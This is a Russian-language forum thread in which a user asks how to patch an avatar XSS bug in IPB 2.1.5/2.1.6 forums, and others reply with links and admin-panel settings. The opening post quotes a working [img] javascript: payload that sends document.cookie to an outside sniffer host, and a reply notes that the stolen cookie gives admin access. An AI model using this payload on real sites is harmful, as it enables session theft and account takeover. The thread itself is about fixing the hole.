|
Как пофиксить баг в форумах IPB 2.1.5 и 2.1.6?
Как всем известно в форуме IPB 2.1.5 и 2.1.6 есть такая бага, которая позволяет получить ХЕШ через аватар, по средством:
[img]javascript:x=document.cookie%3Bimg=new%20Image()%3 Bimg.src=%27http://antichat.ru/cgi-bin/s.jpg%3F%27%2Bx/*.jpg*///.gif[/img] для версии 2.1.6 нужно просто убрать теги [img] у мня просьба : Подскажите как профиксить эту багу? в каком модуме ошибка и как ее исправить? Если можно ответ скинуть в личку. Заранее благодарен. |
В основном всё на сайт по безопасности расписано, где, чего, в каком модуле...поищи
|
|
http://www.ibresource.ru/forums/index.php?s=&showtopic=31531&view=findpost&p=18774 3
|
спс ;) я нашол там одну темку , но чет не помогает:(, может эта бага еще осталась из версии 2.0.*
|
Вот последняя известная бага, как пофиксить здесь.
http://www.ibresource.ru/forums/index.php?showtopic=31531&pid=187743&st=0%EF%BF%BD entry18774 |
Да эти я заделал :) , я никак немогу разобраться с той что через аватар :(
|
Если ты хочешь запретить [img] теги, ну то есть использование в них изображений. В которых можно поместить сниффер.
1.Заходишь в админу 2.Идешь в Настройки(В меню выбора сферху) 3.В "системных настройках" выбираещь "все основные настройки" 4.Переходишь в Темы, Сообщения и Опросы 5.В "Создание сообщения" находишь "Разрешенные к публикации в сообщениях расширения файлов изображений" и просто удаляешь все разрешения которые там стоят. |
хм... а разве хэш воруется не солёный? тоесть от него же толку нету это просто активная хсс.... только кукизы тырить...
|
bl4ck-cat
С этим кукисом можно только под Админом зайти. Ну а топикстартер не хочет этого, т.к. злоумышленик может по форуму как админ лазить, все редактировать и т.д. |
| Время: 10:50 |